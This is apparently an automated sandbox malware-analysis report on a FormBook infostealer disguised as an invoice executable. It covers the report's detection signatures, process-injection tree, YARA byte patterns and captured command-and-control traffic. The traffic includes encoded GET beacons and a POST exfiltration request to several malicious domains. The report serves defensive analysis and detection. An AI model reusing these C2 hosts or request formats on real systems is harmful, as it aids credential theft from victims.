Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised Invoice H000127896.exe

Overview

General Information

Sample name:Revised Invoice H000127896.exe
Analysis ID:1520359
MD5:2a489cab1a6113a0f082d8bfee40ead9
SHA1:9d422436b62b0afc1c4a24295940ef93724a1580
SHA256:3f92b6ed5e7ebacc4f0039ca5fcbdd19d4690ca3fd0b73dc2c9e2df580669e6f
Tags:exeFormbookPaymentuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Revised Invoice H000127896.exe (PID: 6804 cmdline: "C:\Users\user\Desktop\Revised Invoice H000127896.exe" MD5: 2A489CAB1A6113A0F082D8BFEE40EAD9)
    • svchost.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\Revised Invoice H000127896.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MUjPkRkjOWKkX.exe (PID: 3576 cmdline: "C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 2148 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • MUjPkRkjOWKkX.exe (PID: 3628 cmdline: "C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6496 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x73ef1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x5c030:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f013:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17152:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", CommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", ParentImage: C:\Users\user\Desktop\Revised Invoice H000127896.exe, ParentProcessId: 6804, ParentProcessName: Revised Invoice H000127896.exe, ProcessCommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", ProcessId: 2848, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", CommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", ParentImage: C:\Users\user\Desktop\Revised Invoice H000127896.exe, ParentProcessId: 6804, ParentProcessName: Revised Invoice H000127896.exe, ProcessCommandLine: "C:\Users\user\Desktop\Revised Invoice H000127896.exe", ProcessId: 2848, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Revised Invoice H000127896.exeAvira: detected
            Source: Revised Invoice H000127896.exeReversingLabs: Detection: 42%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Revised Invoice H000127896.exeJoe Sandbox ML: detected
            Source: Revised Invoice H000127896.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose,5_2_0213C240
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax5_2_02129A70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then mov ebx, 00000004h5_2_029304E0
            Source: Joe Sandbox ViewIP Address: 217.160.0.27 217.160.0.27
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw== HTTP/1.1Host: www.07t90q.vipAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.5oxzis.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.kuaimaolife.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.07t90q.vip
            Source: global trafficDNS traffic detected: DNS query: www.concept.pink
            Source: global trafficDNS traffic detected: DNS query: www.5oxzis.top
            Source: global trafficDNS traffic detected: DNS query: www.kuaimaolife.shop
            Source: global trafficDNS traffic detected: DNS query: www.nodigitalsmoke.org
            Source: unknownHTTP traffic detected: POST /4yov/ HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.concept.pinkReferer: http://www.concept.pink/4yov/Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 49 4a 63 42 53 4f 41 4e 6f 4f 31 66 38 70 45 70 4b 6d 75 71 41 4e 2f 55 57 37 74 4e 64 54 56 68 61 4c 36 6d 72 45 73 3d Data Ascii: jz=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uIJcBSOANoO1f8pEpKmuqAN/UW7tNdTVhaL6mrEs=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 